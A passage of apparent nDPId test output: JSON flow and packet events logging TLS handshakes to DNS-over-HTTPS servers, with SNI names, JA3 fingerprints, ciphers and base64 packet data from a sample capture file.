UyB0oeuLgjlb0FpWzQ\/lyORIy\/GJNnRuRgdZy8RNv03eZWNeLTHNU8amNvoSqoCJx28QcG4ZFWjkiBlGlisQg9MS7LfxB5YDcM35ukvbr57gX64nw00G3GJe5JnYnqeIHNIuWQI7nvVvBHP3PfWTKRa21nyK90D70j+bxIjA68ylRrcDSlrq9zK60l62NWR551fMFXxuoHTFc7qQ+K4J0ESDuqw7x47BFgsRGeVuVNYexUC0TU1lBMwcu9BGg+0G0+duPvOP3aW+jzZAhqEMopcx946w0BTw\/+bJ5qiZX+nSvNF+IzKPfnXq7G+okmmjpg\/ianwcwtjvgrAC4pnZGY+m\/27CyJiTEi9fYvN2T1KGpFt19LfH\/UKHKmZdKRHhHpgpAUwyz0ixR7JCGsZBCNp7SmZtoObLBfKyYFLS1OdeJn33VC7QU5ZIB0TIGMOnasD1IIceFavDDD1uWjFat9U8TSvdQkrVOP0H+iiog+bscrfkzNeLsrOj5JaS96ZDARUESAXVBQE+wq3Z0J6WrNdNJCanh0R13lIIfbBO3tp1JQaYJcU43NTOBatEStIgR6pggN4HF+DO2dNPqB6DJlllwkNWiMSwaSg\/Qokswn+fLJvn7pPXb8ILKczNLht2jz9aEp0+I8QfJ9sljCRmG\/qdZknc3MVkUZCxQWgeYvnw16OCgKVrO7aXg97ZXgFQywgIz4XcG4cQlmlUgZ5vBckLpEq1wb47O2DC7oYeIkB7WvMn7pIP5qKMmIewtCOip18QV5mNZQ7kfdTHrJyhNEAXbfaMkBbJyAVJGCBIYwvhIF13Izb7B6Cmnolxq1r5eurWQOB44xUuJop6m5Nm5hxmATag\/xOQnBP8r2vNMxUihmUT8anHH3UfjXAY915xtFCA13IdATjUK5r\/nOjWuYELtJmgRJ2oeyJFl+xU3enOifKqvSW9w3npBMuO6+ND+s2KXgdXZpDonBBs70SsK8NzgIT\/8A0se3txfhbwpY2EseDOLiVbMtTN8WhjrhnZpDEjzwdCV8jV8ki7+xTW6Ae32nBN9uRAZ20gpXPNrrgk+1oPaXal74NAuojgux90nmy7fGQvJ\/CCkJUFP2+xt7moAmNV6Bvh9GIV51tdhbag9+AtGmBI8WUGXz9QPwduT4nOO+Ia6cTJuP1+CL3tb+p6ijB1Jg583CQ8vtkm3Pw8NXcvYMcBOIpsKkRrBsD67+irg6nQFwMDARkSIsFlIX96rBVOSHF8j3nD4OzTmAKQfrZ20qhfNZw8PH0q41dWeUeDXwstCBpDPbSnxrC2ED\/1S7AKbK3628b0BuTXrCb9vI9IIN\/fjnNzXGCyCTfNGyQC7Z2s3ZZgGilAyQTgWS6IBv0X\/cXimIPEtNGeEgUfHp2ZiHChqtgUwdJbYZhYRpk9Vh4PP\/G\/geKDMJuF9LkfMNZa2A5\/kJwnnbAN+9JGdzxyQUZGqq8DCQqxQ4uAbnIJmcLNJBx9PHCzhhj8vk0E7hUaqEkvClX1iiIhNhFlmQ9FsqBvx5KYUvaVI86YI314BKZUdBn0Gn9Psqh3g3PCqYbuhSA+KXAHAB6ifkPpQbZxhpKA+yQN\/aKxaWBvyR8fvBcDAwBFUlHyM0i8aQGJ+PRPScWQmM6JruXTVxzLP2v5t10WMRjAfhtdK+kbZwmOwuBqS0fXovjROfDM5rGu95fh\/DYXUBWZSAER"} +00948{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":267,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739354159,"flow_last_seen":946739354179,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":3114,"flow_tot_l4_payload_len":3399,"flow_avg_l4_payload_len":1699,"midstream":1,"thread_ts_msec":946739354179,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44640,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.dnslify.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00570{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":946739354182,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":946739354182,"pkt":"REREREREZmZmZmZmCABFAAB4sYBAAL0GQFYKAAABuetRAa5gAbtwXMQ7YngMcFAYAfXMEwAAFAMDAAEBFwMDAEWXq32pwHEzhcGDp\/NKLjvxgMAkksKxKcFIOFCDodEb90S6h8Gu0G\/BLuFfZ5sttQB7HESBT0tBjYEfHL61VthvR6QOjls="} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":287,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739374011,"flow_last_seen":946739374011,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739374011,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.202.176.26","src_port":43106,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00844{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":287,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":946739374011,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":339,"pkt_l4_len":305,"thread_ts_msec":946739374011,"pkt":"REREREREZmZmZmZmCABFAAFF9DpAAH4GIdcKAAABdMqwGqhiAbtWR3H7NJTy0VAYAfbm2AAAFgMBARgBAAEUAwO\/FCTCx\/QYlyW+S6EGE0TFYQ1H3k3FO+5pvJMM4NWMBSCY7MF+HV8NsAFc82xlqHj0YcQW9bewwKxZQwscQJJKpgAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAClAAAAFAASAAAPZG9oLmxpYnJlZG5zLmdyAAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIOxloY7MOWvSgZ3hQaojp9inJ84Sw+igf7hW9Y3pU+ch"} +00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":287,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739374011,"flow_last_seen":946739374011,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739374011,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.202.176.26","src_port":43106,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.libredns.gr","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +04697{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":288,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":946739374036,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":3179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3179,"pkt_l4_len":3145,"thread_ts_msec":946739374036,"pkt":"ZmZmZmZmRERERERECABFAAxdEw5AADYGP+x0yrAaCgAAAQG7qGI0lPLRVkdzGFAYAfXx8AAAFgMDAHoCAAB2AwMfdsQbzuiYRNDg0SBjCCwcHmnTX\/WaALeQBUBykWdcaiCY7MF+HV8NsAFc82xlqHj0YcQW9bewwKxZQwscQJJKphMCAAAuACsAAgMEADMAJAAdACCFS52dOnPWMZ+6KGOu9y\/QLNkNywSlNldrBcP9ygUsJBQDAwABARcDAwAkRYbUEe0KLtMYBo7DwIYWcyipqqBN\/bxVehyh0Sw6cb936jKFFwMDChoofwyGB1vpwXv7Xn4hXSbG1vtIeMernYPn5eAfJWckDiE1Vl5RxqW26TSWUTfmtG\/80SN\/HcC8sF8BZiFAAmCY47UJ7uXvVoDqw8BmwUzQhTAJ8CR9FaoGVeJsM5UnR3QsIEHqP5KqlB9iD+UdFFEShzmfIEBTbyB2lP4pQWBOWz2wOPIXZhQnKMJCxu1mnXifSB+KRolJ9fD2dQ4Cx5+85+F56fGG9StYfwFmGPIeJARJjwh49nZDI4iYWv+ddPBM2\/KJRuF+1TvTRam5R+I0m2+MFl1IOG\/mGs22lUpFRiEafHau8IgYwLtIsVJVRXeEF23eSSLjZSGlI+95kanzpb7Gq+bxaPB\/4KE\/EZB\/HHORaklfdEzQyROMT29wGcN987isDVey45rLfbLMKOZqZTAfIY9fCmEJfoMGXsfxScuGJL3kk9ktG5XOrDaDe+Mw8iBMs6aCgsJWCKp9AlmnI6jM+Pkj5pJEm1bom4ksHEDAz1NZ0ftN\/sVLZn9Ug2C7F7lT1GzkA6PKlKc6EZ2z5CZ6jJ2Z6Y6MlAZziPoOQu4qTh3J+nE8GcgGOJ+4zh9BbyrU\/zs1GjsbXVkHAo7jDaYOsfbK6OwpKfl4fhdC60RX1KjskIAX35OHA\/IXKzAnkgHHInCPGyjRoDeCN\/xxIMzVFrKXTCwf2SPOaQSeCd\/JvCgSVj\/dHhq8zdYnlFf+z9VXpf9xqp8dTGqqOXUGFnDAdjBQ71FnqfI6ubmeRFAjPpvyUbaEAnejXwHU9g6Nb1kInR39UeMaOlkv2XbX4eVVedQBnQ80TEebS+RYgvF4z+JaZdzTDBKsiCrr90MrJqELQ15ruqB7RM0T7bzUmBAp55RHbt\/ccY\/TkG\/gVsixMDlDFkIhMYt9MdUi87PoFTfnAamhlvAw7oZO8\/F7iHmtBa\/Ep7E0DP9U5QDAi98hWmChSAXTUreygTLQuqQnUJmosGexWw5Cm8TG3r4N5gnkEVB3HVNF0Bviuw4E\/LgbkZLCP6\/4igcruIsBRgEN00dS6JnGlucNL86jMmrPxWv6fGd6uX4GyIhA8xlh3VmZmkdtEaBCAvedT6MuQU0ug0OS0vhYWi4hpFSwBYkEc7nVVyMbvGRC\/t6cdur00RqtQCHbN+NyMsAYQCMLcN\/MBgJi53gtKoOeVRxL9efr0oSMfPFjg62k6KC1lR+0S5m3Izs0xuBIpZ4qwdqzDBYxqETxd2mAw6qyV9\/+c2vTZTjQfcpnp7y1uBxTcCkKvdXtnytMj88r6V3CNsrCqoiP+HgdZ35NIzfdjE8dt6Do9yQiQH9DyOtUx8mNKBWoW2GsDQem5ZGAtDwjmFRhkWEqvnuAWeKZRQvsxDNQX1VGCheiYk47AXsweypHM0kF7Sz+NMdgmJ2lYhFlZ1\/ixGlfZSk6mjv0hogoEvvV0z6\/T5ayYUiYrSxxE5CRTBXiQ0ShTnl8JnNrX5f1+PEHiTs9VmgpKgcqyhnAx43FvFz+tjAq2kHUpARsisN76U\/4szTnIzPWHuhFJGJXIYtA6KvZZsRr8X45Bjm7782fphZHssP9T11fz+rMBuNZkB+9kENQs834qUDrDWQYlgtgokMydJHahHIc4rs8RwpnWkwnfbjQyRwpkoSDjqKCsoWgqmckVcAlWtfj+PYNdYUV0GJVz3MaCILZ2I6i8QDOlFT6AvpNPYOGoGbJ0wKc\/iRHcSqwHkLOlqAj9rNOane\/dG8vbDHghfqFdeNPvQAcyGldxWfqiN032Vix7+oZXOFXeLNRXDRdMWbSqMlyCprTcKldxAe+jYGRK\/SRNNln4bS6loI5LqK5kRj1qHOQs4VYAvb6aRZkpJmFfA051r9ZTveZwX8QvPcsUhSp6WJroM5RdVgMoZWRw3V3kLzy526l\/XjarCqs7b9zg4\/0UThyCoRZXRIaapKAxcisr606oQ90EO6V1\/rxbH5QoNdmuIBJXUiCC+vi9DaFQhw7IS7rYl6bCaQkE1gKVqVjcfGFNbkwZ6WVIIFLAd4AULNZ0EbDr3Jxz4Q1Kv61lNl9GOAmC73UocSHTqPhV\/xb9YLlv4Qj8A9VyOXsI3ysVAT7Q3JqQoSzzANJennQVJORrvCGjBFhIJA1XuVUswlY7d8l6GIPFEndkzdJv+mqLebs92Ve7y8gHX+5\/N3bWQDbvROspZd9Rw2VYwhVeRkdNNkB9Zd4yf0MJA6FKQTPIvZ1j4Zvrf8Zqj1FK4+Pu5YWK2VzQ1bAzEZ5TAhqXro79v42FstXXH9Bjh6xGWnYs4EgdjNtrw9q9vDDHzkCgGXErTBS5tZpn4eq4iayRQKOUo2Bjzuikc3GCcT7DGLOzNijLOjpstykBtjYEBagL1lzeuQbGqMxLzwOzMZiM6Cr4dH6Ct7enfPKr1l7EDqLb80TAVFsE6E9zPStbSvvDsesVjI0LnHLpiFF3QD7w\/cMgXGCCQFz4kjOyjxN1ueQ3BiQwzUZI\/KQVjymbQQOaDcU\/hamroqvDR3psu8zkzqDRgXxZpAhYSs0ypnNhUomh4K+raYSufO72xoIxT3MchbmB2xOG+FHTInGWwMp665VQ8P5TZyqYPfZdJpda3UJ4l4i+8AGeTKq9cySdx4swdISz3V3xxrTEFxvjq7CgCc0mdfHRwUrslFZ\/8xz\/GkZ7unKM4nUXsR2wjAWglEejYWAjwBH57asssV4a1smVbgfitfljZxOQxeCULZkhU5iCbDWtt61dkKbIg6Z5Ib6wqsZbKsTNF5BUW\/OluqVhEnnxYi4bC2p8oeMOIg9Xp0ohk+2eyHzNnL7PsT\/0TJd+8z\/6rR4GfsNhau8JwG0sVxaM3gQ\/C1BUi59C0tclt8uqB8v4sL+nw1kYxtxvVF+WgZBhsUG6jtsTkz\/h7Vqr1uE1yqk6VMywMNzSK3C6Y5jNYNZlGRunhyx+Wvqoy4kyzKlb5KJu0D6Ibb9tx4jkjfsAgRv1kb1\/YV+5pR9kOWTI7kTR0GhRhEcYVSuszO6GztHF17jUv1HGqvUE2Y1nYTruioVBGxNU2n\/3D8R0H0Ev+WM\/lE1CkAFwkkBnRPnHTXpqQgZZhPNhQeacIL4PiCwXLGj68pqU9sBR5k+Qs1xeKaXL1uB\/+DlBrxDF37H0xYTjNyCifmppE9xs8wUURoGCYQz8YrJzWYbNTp6iS3VA9PqxHbxpwe+T0EJG3w+ckQ4AZZWQJfpeYEAjUJVTV+JzyForU6vnGB\/f4UtM5hkLlLR2yX4QW5z2sMH+oemvxHSO3c4dMYOamZjpEAr8HZR\/eYtA\/+k47KLbbuC8LadTWp9kx60hq9j0ZTOjnZRbmpU7x4+baRS3lSZ4uCKQhRDRs1bz+OmCsokrpdBvyRNmpmdHu7+xcAAbWr3GDiMDDj2MeLocIu6VxMJmWwaV6i6S3OZRKsCOQTd0Jkp8jCBeqO4YH7rnKVrcOwj8x\/xgYsXAwMBGfgS0Z5JTGD28Vyg2LfJHOWz9mr0ZY69GFX94xRplNLJ90YhSqkDA41SrPaRCa\/yRHZpmo6Z1mQO81cAsIuYw3\/dzrRByb+dTIlW9yt\/sOP7usPp6PbdD4rTPrbEK4QR\/+wMzHeanap2HaJcY2tnK9Pk6wr3URSABWoCiW8bBJ44gM\/wYSxUIN9fZQXNHmUFX2+4E+pzfHMX+TPSUHrGMWaQGF+jm8f8JzgtBamlKFf0T7ESBzmOVDFYKLq5HkwIpwu7FecWONEwB4QKksZp77Ks7VMI9z7kgYi8fKP1AlrK0wJXYhtL9bgNIor7UcK\/cBVJ2AclPTcIWxPGf\/H2qC2ccHzN2oQA1YRLpy6QS\/qocCCtoi9irrhlFwMDAEUNWvqMs\/h03WKKdBMbYkawhmSS9CnEEwNmSHsUo0aFsC+NuRuOS7d+gyt4adOBPfCXNUuX7r\/jeMTBHE2RkzGNnd\/d06g="} +00950{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":288,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739374011,"flow_last_seen":946739374036,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":3125,"flow_tot_l4_payload_len":3410,"flow_avg_l4_payload_len":1705,"midstream":1,"thread_ts_msec":946739374036,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.202.176.26","src_port":43106,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.libredns.gr","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00571{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":289,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":946739374036,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":946739374036,"pkt":"REREREREZmZmZmZmCABFAAB49DxAAH4GIqIKAAABdMqwGqhiAbtWR3MYNJT\/BlAYAfXmCwAAFAMDAAEBFwMDAEUX9381c\/+R1qgydby2LZz\/D1isDmITv8iB3tIfcLl3X1ZN85j+RzDG7ZR0PP5I0SioKkHY5OtmjMfBNJaLny9tLOB5RTM="} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":303,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739378281,"flow_last_seen":946739378281,"flow_idle_time":7560000,"flow_min_l4_payload_len":290,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":290,"midstream":1,"thread_ts_msec":946739378281,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":59026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00853{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":946739378281,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":344,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":344,"pkt_l4_len":310,"thread_ts_msec":946739378281,"pkt":"REREREREZmZmZmZmCABFAAFK6MRAAH4Gn0EKAAABVQVd5uaSAbv2ZmEwaR3\/oVAYAfZ05AAAFgMBAR0BAAEZAwPCcBaP\/DC8hVoTSokbsQvpjhaLnYrt7eKsiMQ8EXb5AyAAGOihE6CuqcDNXckkTdE7CmzbbGzUcC6GWkBVFb5CcQAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACqAAAAGQAXAAAUaWJrc3R1cm0uc3lub2xvZ3kubWUABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAg6FKiZGfISPafy0Na34RI3z\/9T8Zo5Ona0mhcVKXwyTI="} +00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":303,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739378281,"flow_last_seen":946739378281,"flow_idle_time":7560000,"flow_min_l4_payload_len":290,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":290,"midstream":1,"thread_ts_msec":946739378281,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":59026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ibksturm.synology.me","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00592{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":304,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":946739378310,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":153,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":153,"pkt_l4_len":119,"thread_ts_msec":946739378310,"pkt":"ZmZmZmZmRERERERECABFAACL5iJAADQG7KJVBV3mCgAAAQG75pJpHf+h9mZiUlAYAFOUtgAAFgMDAFgCAABUAwPPIa105ZphEb4djAIeZbiRwqIRFnq7jF4HngniyKgznCAAGOihE6CuqcDNXckkTdE7CmzbbGzUcC6GWkBVFb5CcRMCAAAMACsAAgMEADMAAgAZFAMDAAEB"} +00948{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":304,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739378281,"flow_last_seen":946739378310,"flow_idle_time":7560000,"flow_min_l4_payload_len":99,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":389,"flow_avg_l4_payload_len":194,"midstream":1,"thread_ts_msec":946739378310,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":59026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"ibksturm.synology.me","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":305,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":946739378311,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":946739378311,"pkt":"REREREREZmZmZmZmCABFAAAu6MZAAH4GoFsKAAABVQVd5uaSAbv2ZmJSaR4ABFAYAfZzyAAAFAMDAAEB"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":325,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739378577,"flow_last_seen":946739378577,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739378577,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.28.34","src_port":33724,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00845{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":325,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":946739378577,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":337,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":337,"pkt_l4_len":303,"thread_ts_msec":946739378577,"pkt":"REREREREZmZmZmZmCABFAAFDLylAAH4Gh5EKAAABaBwcIoO8AbvZKqUSoyMYWVAYAfZGMAAAFgMBARYBAAESAwNktN1XF4bqrby0niN\/MgT4p6NPXKBlRwOJCoza94pvXyD9DZHEPvQMzjP6pbu5TmyGbnG5vDXlt6MJFI6XifT24wAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACjAAAAEgAQAAANanAudGlhcmFwLm9yZwAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACBNe3CKgugpSU\/ahaeKXUN1ypv0O\/7wv4rJDS1FbyCQKA=="} +00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":325,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739378577,"flow_last_seen":946739378577,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739378577,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.28.34","src_port":33724,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jp.tiarap.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +03848{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":326,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":946739378607,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":2557,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2557,"pkt_l4_len":2523,"thread_ts_msec":946739378607,"pkt":"ZmZmZmZmRERERERECABFAAnv8ehAADcGAyZoHBwiCgAAAQG7g7yjIxhZ2SqmLVAYAEJO3AAAFgMDAHoCAAB2AwM5\/Tpf+0rVAVLiqp3AKzeP0oc5LUJ7LbPa16oj3TgNDiD9DZHEPvQMzjP6pbu5TmyGbnG5vDXlt6MJFI6XifT24xMBAAAuADMAJAAdACC6HV5GLKVmM89uM3s2SIWu43Lfyhq5unw8YJ6WUfrNYwArAAIDBBQDAwABARcDAwk9PLTYD+JT2QAppt0TUbAwAmxAstQCMsQy32ww9oSEEAAMGSMNt+TTdp0V3tZ3ctmeFKC8drVcJHMoKPW\/gLMtyIUmD\/3+eYMhUKtI+3FRz671m\/FiCxQ+DYhEAA2djrJV7bAD8riXyaqFyW2aaJF84flOMuq9DLwOUI0IypM1HnMNVT7vNmCordbJ4vYfoJCHZ3Jdxa1PMxflxUdqb7t2xbf5y\/m1Lgj+QBUEN2VGq3ZK1ktt1GgLlt5OMY6q\/EMncuhg\/OHccuz87CSxEURWL2O5XG3NQ8ZSkyDIF1XtrmR6FGXAhlzN0GIMFD4mIZ5QqyhyGprKsDD36CWqaTOR27WUIRMeWgua2kpjr+elVVRiIT0yfyvShMeR5KvvMj5AG9M4S4\/qWWxJjIv9qLfYm7RWSC4r34hNlFnFlqsqqqzzh\/BxMvV1bwxfAaqA1qBideWKRVA+7EuN95c4ue7X\/hRVHEx3iQLqTqKG9s8vcXeE42KLZOgVl3B7xu8\/i92\/WkhbHAp1VaoXVrJw6GLiISb\/po8DiOQt5NIdGX5eDQSEZ7O9baKasLWzq1YkwfZijF3n9KVs9qv2KSy5IfvS0SD4T0T96JowaLvO1lvBNbG7CindkMAn7au9+n1sxBnSgPOEhxjP6eP7I9klViNjl15nUFM6o4r0CQuVxRwVYjFh10tMhUtqr5ufjJtftBeIT7Z6ffMsMrzPdyzkIvDM+swGXo7V35YzVo8DyoBYe9uM0JJnrorf04OKftnG+pjuV1J118k\/TcF7dgWMascYwrYulqMRqr3vNGGbqZxylwmKp462M5UtGuo+qerBWSrRXWS6eh\/Pd34MrDX1VmvCOR23Z07RB6KZ9U0a03sYPKhsU\/m8X7Y3lJg3mFbu5qAjYzD1O+cD4Myf40iIoCP9xcs4bu1pUmgjVbsp3ut86GCDAgM+2h3m+dYO91dTNrC6JdnpsdKfoGqobbC1Nd6P0Kznfd6xn\/BQDvXNQHf